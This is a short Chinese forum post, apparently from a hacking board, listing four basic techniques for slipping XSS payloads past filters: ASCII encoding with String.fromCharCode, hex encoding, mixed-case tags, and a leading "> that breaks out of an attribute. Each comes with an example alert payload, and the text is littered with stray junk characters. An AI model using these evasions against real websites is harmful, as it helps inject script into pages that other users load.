四种超级基础的绕过方法。# h/ M7 G/ f6 c
1.转换为ASCII码
) s; g0 D1 {( Z: x例子:原脚本为<script>alert(‘I love F4ck’)</script >% I" q4 z9 r4 K x, {
通过转换,变成:8 o4 s. }8 T4 Y8 Z- S5 t
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>- D) J. y; y9 ]* V% X9 G
0 a0 g0 D4 L3 ~! O# t
2.转换为HEX(十六进制)* o" p: t% _3 d+ P$ O+ g# |5 Y) E
例子:原脚本为<script>alert(‘I love F4ck’)</script>
( _0 z; m$ ]% Z0 o# t# O# _7 K通过转换,变成:( t, a9 t7 ^6 R2 H/ f
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
0 b2 R% ?' I/ x/ { & z9 w5 f9 f" }2 B
3.转换脚本的大小写1 K# ^# T4 l1 E: I5 C; }
例子:原脚本为<script>alert(‘I love F4ck’)</script>
4 Y' Y4 a* b3 Y2 ^转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
0 j4 U0 q* p% k2 o8 o4 ^0 {
. k- R: M) k) I: t; V4.增加闭合标记”>
3 J8 T" D7 E% v% [' v' Q5 l$ g例子:原脚本为<script>alert(‘I love F4ck’)</script>
' ?+ b% d. _9 M9 I! V转换为:”><script>alert(‘I love F4ck’)</script>
# n. c5 B# p m2 ?更详细绕过技术请参考此网页
' x0 L7 T3 N3 O, j1 chttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet \. j- F# B: j
6 }( o( @# ^6 A* {0 F转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对